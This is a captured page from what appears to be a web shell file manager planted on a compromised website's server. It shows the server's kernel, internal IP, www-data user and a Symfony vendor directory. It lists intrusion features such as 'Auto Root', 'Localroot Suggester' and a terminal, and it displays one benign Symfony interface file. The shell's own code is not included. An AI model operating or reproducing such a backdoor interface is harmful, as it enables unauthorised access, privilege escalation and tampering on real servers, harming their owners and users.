Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.79
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
symfony /
config /
Delete
Unzip
Name
Size
Permission
Date
Action
Builder
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Definition
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Loader
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Resource
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Util
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
CHANGELOG.md
4.6
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCache.php
1.49
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactory.php
1.07
KB
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheFactoryInterface.php
937
B
-rwxrwxr-x
2026-02-24 17:34
ConfigCacheInterface.php
1.24
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocator.php
2.68
KB
-rwxrwxr-x
2026-02-24 17:34
FileLocatorInterface.php
1.1
KB
-rwxrwxr-x
2026-02-24 17:34
LICENSE
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
README.md
596
B
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCache.php
5.49
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerConfigCacheFactory.php
1.04
KB
-rwxrwxr-x
2026-02-24 17:34
ResourceCheckerInterface.php
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
composer.json
1.2
KB
-rwxrwxr-x
2026-02-24 17:34
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; use Symfony\Component\Config\Resource\ResourceInterface; /** * Interface for ResourceCheckers. * * When a ResourceCheckerConfigCache instance is checked for freshness, all its associated * metadata resources are passed to ResourceCheckers. The ResourceCheckers * can then inspect the resources and decide whether the cache can be considered * fresh or not. * * @author Matthias Pigulla <mp@webfactory.de> * @author Benjamin Klotz <bk@webfactory.de> */ interface ResourceCheckerInterface { /** * Queries the ResourceChecker whether it can validate a given * resource or not. * * @return bool */ public function supports(ResourceInterface $metadata); /** * Validates the resource. * * @param int $timestamp The timestamp at which the cache associated with this resource was created * * @return bool */ public function isFresh(ResourceInterface $resource, int $timestamp); }